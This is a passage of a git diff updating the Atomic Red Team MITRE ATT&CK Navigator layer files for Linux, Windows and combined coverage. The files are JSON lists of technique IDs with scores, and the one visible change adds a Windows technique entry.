iqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index b9533028..03b04c3f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index f3fa5f62..dc96ba52 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100